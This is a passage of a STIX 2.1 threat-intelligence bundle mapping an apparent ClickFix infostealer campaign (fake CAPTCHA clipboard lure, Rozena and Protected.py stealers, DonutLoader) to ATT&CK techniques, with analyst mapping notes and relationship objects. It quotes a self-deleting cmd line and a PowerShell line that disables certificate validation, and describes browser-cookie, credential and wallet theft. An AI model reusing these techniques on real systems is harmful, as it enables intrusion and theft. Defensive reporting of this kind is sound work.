      "name": "T1564.003 \u2014 Hide Artifacts: Hidden Window",
      "description": "SyncAppvPublishingServer LOLBin launches PowerShell with hidden window.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1564/003",
          "external_id": "T1564.003"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7d0c88a1-18bf-42a2-bf5e-7aade64b9d3a",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1485 \u2014 Data Destruction",
      "description": "Injected svchost.exe self-deletes via cmd.exe /C ping 1.0.0.1 & del svchost.exe.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1485",
          "external_id": "T1485"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e7c64603-910c-46ca-aa07-e85cb6ba2432",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1553.002 \u2014 Subvert Trust Controls: Code Signing",
      "description": "PowerShell disables SSL validation via [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1553/002",
          "external_id": "T1553.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5dc2a226-e68f-4783-b8cd-38247d4fef7d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1082 \u2014 System Information Discovery",
      "description": "WMI Win32_VideoController queried for VM/sandbox detection (Rozena + Protected.py).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1082",
          "external_id": "T1082"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--008a4ad5-b0f1-4180-a7e3-9d3a58c0c143",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1012 \u2014 Query Registry",
      "description": "payload.js reads HKCU\\Control Panel\\International\\Geo Nation for geo-targeting.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1012",
          "external_id": "T1012"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6a49e18b-18d1-4720-ba93-eced5079b060",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1539 \u2014 Steal Web Session Cookie",
      "description": "Injected svchost.exe opens Chrome History and Cookies.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1539",
          "external_id": "T1539"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b779f195-2015-4fc3-8419-68353cb9518c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1555.003 \u2014 Credentials from Password Stores: Credentials from Web Browsers",
      "description": "Injected svchost.exe opens Firefox key4.db.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1555/003",
          "external_id": "T1555.003"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0d4a453d-722c-43a7-bed1-3521d275cc28",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1531 \u2014 Account Access Removal / Crypto Theft",
      "description": "Enumerates Electrum and Jaxx wallet files.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1531",
          "external_id": "T1531"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bd64e0b1-836d-4d1d-a305-c98f470840ea",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "Stage-1 JS decodes its obfuscated string array at runtime (RC4 over Base64-encoded entries); the loader's injection logic itself is not obfuscated in every variant. PowerShell payloads are passed Base64-encoded via -EncodedCommand (command-line telemetry should also match the -enc / -e abbreviations).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8614fc05-7c49-47c3-9248-4c1d60c5e1be",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1620 \u2014 Reflective Code Loading",
      "description": "Protected.py writes wc*.tmp PE files to disk, maps them into memory, then deletes the on-disk copies. This is reflective loading but not fully fileless: the transient wc*.tmp files are a detection opportunity (PE written to a temp path and deleted shortly after by the same Python process).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1620",
          "external_id": "T1620"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--79fb3213-1f11-43e1-956c-b8d8e253d0ec",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "WMI Win32_VideoController query (presumably checking adapter name strings) used for VM detection. Stage-1 JS: setInterval-driven debugger trap and Function.constructor('return this') sandbox-escape probe. Mapping note: the JS debugger trap is anti-debugging rather than a virtualization check and maps more precisely to T1622 (Debugger Evasion).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--224b0c8d-55dc-4fc3-b518-1dde14ee8a1e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "Staged archive python312x64.zip (presumably a Python 3.12 x64 runtime bundled with the Protected.py stealer) hosted on the third-party file-transfer service filemail.com (3004.filemail.com). Mapping note: T1608.002 covers uploading tools; because the archive carries the Protected.py malware, T1608.001 (Upload Malware) is at least as applicable.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0d0461cf-e98a-4e7b-8aac-5aba97b7b803",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Stage-1 JS injected into compromised, otherwise-legitimate WordPress sites (cannabis dispensaries); the ClickFix lure is rendered inside a Shadow DOM. Mapping note: T1189 implies exploitation on page visit, whereas here the compromised sites only deliver a lure that requires user action. T1584.004 (Compromise Infrastructure: Server) and T1608.004 (Stage Capabilities: Drive-by Target) describe the site compromise more precisely.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b6716550-aae5-42da-b926-70b90e26b397",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Fake Cloudflare CAPTCHA social engineering: clipboard.writeText() places a PowerShell command on the clipboard and the victim pastes and runs it. Mapping note: no software vulnerability is exploited, so T1203 does not apply; this is T1204 (User Execution), specifically T1204.004 Malicious Copy and Paste in ATT&CK v17 and later.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c6f4115-4781-43c8-b54a-12602feefe2b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "description": "OmegaTech deploys Stage-1 JS TDS loader via WordPress injection"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--80e88d9a-0b96-47d4-9982-cf469ecb95c0",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "description": "OmegaTech delivers ClickFix PS payload via clipboard injection"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0cbd74d-6c62-42cd-9d0a-3e0e8db28b07",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "description": "OmegaTech deploys TR/Rozena.Gen infostealer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0326b3c-13f8-4257-8dce-a57597cf8c00",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
      "description": "OmegaTech uses WScript payload.js as alternate dropper"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--867798bf-6361-463e-95c5-ec5eaf6c9ea0",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "description": "OmegaTech deploys Protected.py Python infostealer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79fe2860-8c59-4525-a62f-6f27fe90f0f5",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
      "description": "OmegaTech uses DonutLoader for shellcode C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26e03347-5737-48b2-b224-121253f64b27",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b746bc5b-309b-462d-91dc-e55aba21d16a",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--155766b1-6ec0-4070-9bd3-0bc495ca7f3e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82b5a910-a44f-49c2-ad87-19a60381b537",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24334b8a-debc-4329-bf05-e730be79396f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ffea69f3-6d86-4e1b-a388-176e8a92b460",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131",
      "description": "OmegaTech stages python312x64.zip on filemail.com (3004.filemail.com), a third-party file-transfer service abused for hosting rather than actor-controlled infrastructure. A 'controls' relationship overstates ownership; consumers should block the specific download URL or subdomain rather than the filemail.com domain."
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7882815b-6732-4369-8c29-f84eaf16aa54",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "downloads",
      "source_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "target_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "description": "Stage-1 JS fetches and injects second-stage JS that delivers PS clipboard payload"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51328120-484d-4f21-b5f5-13723703e49c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "drops",
      "source_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "description": "PS chain compiles and drops TR/Rozena.Gen DLL"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ade2feb2-489c-4a9f-8d9f-a1d3a7e2ad0f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "downloads",
      "source_ref": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "description": "payload.js downloads python312x64.zip containing Protected.py"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44f0826a-c315-4e53-bcf6-054ee53736d2",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "target_ref": "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
      "description": "Rozena contacts DonutLoader C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--19696ea1-4f68-4945-96bc-3d00af3d077d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "target_ref": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44d388ac-d2dd-485d-916f-cfb26fe59586",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "target_ref": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--554e16fc-da24-4733-9246-74bb4df092e6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "target_ref": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8fa9be6-adcf-42e9-bf1a-762c525ea62c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "target_ref": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e77bd2ba-5eff-4309-84af-631f3c23f98d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e371705a-0204-4e8f-bf02-6da65a4b266c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "target_ref": "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17e64584-6857-4c69-984a-8fdb7aef35a1",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--be5d21db-c597-4746-bf93-f0f207cb2fb1",
      "target_ref": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82caa550-ae21-40f7-a5f3-7bba97ac11ad",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--31d4b9ba-b028-4cce-881e-b0e7de7985e2",
      "target_ref": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e8cb02ab-5f85-436d-a1d1-1d656e52be41",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--4c4a571f-ea83-4dd4-9dc7-32b54aad4077",
      "target_ref": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f4f6d45-0ae6-49e0-811d-7ea977e3861c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e0d5f982-3635-4811-a7c1-6f46455efe27",
      "target_ref": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--12606fed-779a-468a-8ab6-9a50fa1ac4c0",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--91538353-23f6-42ba-9b8e-a77b8c7ef1d6",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b33a459-21cd-4225-a839-d61e65e12cc9",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--d2c06d08-5ab3-4100-b7e0-4eeeaea9258b",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51165798-7155-4be0-8a53-3f5363ec276c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--c74a3775-b069-4570-8a17-270bb4519c77",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--66193590-b311-4bc1-a583-9300a7eb7525",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--258ea0ac-c6bd-4b42-8c89-f77242a0ee54",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f681253f-a810-47a4-9344-6aa11c1ee319",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--185dea0e-c306-46a5-ab00-efb8b36106b7",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee9cbf29-370a-42a0-acad-2016f58791f5",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--79c3034f-50e5-4ad7-884d-80dfafe59bdf",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e3900968-7ce1-4a61-9d56-2a367061d373",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--acdfce08-d674-4e7f-b3ba-7d2c702e66da",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca8c4c4f-f2e6-474f-85f2-314f552b7c12",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--41f15b3b-22f9-4c4f-bef1-68b1c60acc3d",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea5e4ae7-e352-40fc-903a-46f7b3d7658e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--6aa035e5-44c0-490f-8bdc-82446b99d9a3",
      "target_ref": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb1fc6a3-b5e6-494c-aff8-f65e232b3820",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e4dbccb9-8458-43c1-a1ce-58678d9007f8",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f9396cd2-72c5-4eb5-b2df-7ee13f871f7d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--1f3b8c05-7a58-45b1-b228-6fc7c5ab9c33",
      "target_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4b9dd9c-2fd6-40a0-8bf9-95b4a47d6f19",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--7612c7bf-3153-4a0c-b6c7-b030634e93cb"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4134e9a1-216a-4c55-bd19-d105b3b5736c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--99f2ace8-7793-4317-b1db-7b16dc824413"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc7726f3-2384-490f-8904-1f9d1a4c3473",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--57b7b160-ed4d-4490-bb90-78991009371f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0b2c80d-a6ff-46ba-b10e-a0e890a24582",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--f313fb9c-74e6-49bb-80d9-02606d618988"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--588cf250-d886-4541-994b-506cba9c63cd",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--01b04983-fe4e-491f-9481-f738ad87890b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f7126e08-5e91-4bf6-bdd6-8a23efc48218",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--922f869e-8c22-42fb-ab24-ac3bef8d1d0c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4409703a-0021-42f5-8eea-712dd8c031bc",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--5fdadf5e-da2b-4f42-9621-876da67b4672"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77f48057-d0f9-498e-8c5e-fa8834190b7e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--0b92f6a8-147e-4a48-ad1f-629aa22a00fa"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40b71ccd-9056-4389-b4c3-cefce02cd34d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--bb9f027a-3ae9-4429-b16c-51cc48fc4197"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b9f1b1b-b54c-426f-9465-079eb4287437",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--19f54e44-5a76-4319-a03f-600ed5c58fdd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b40079d-f32b-40d6-a73b-b742f5d55449",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--4ad400f6-3d74-41af-be79-d45383f0e37d"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7ce0ab6-8286-462d-ab7b-8d92e4e5cc9d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--753a2633-e834-4ba8-a846-96dfd1bb7ed6"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c692e8c1-8558-489a-9e9d-00b41c6dc647",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--7d0c88a1-18bf-42a2-bf5e-7aade64b9d3a"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
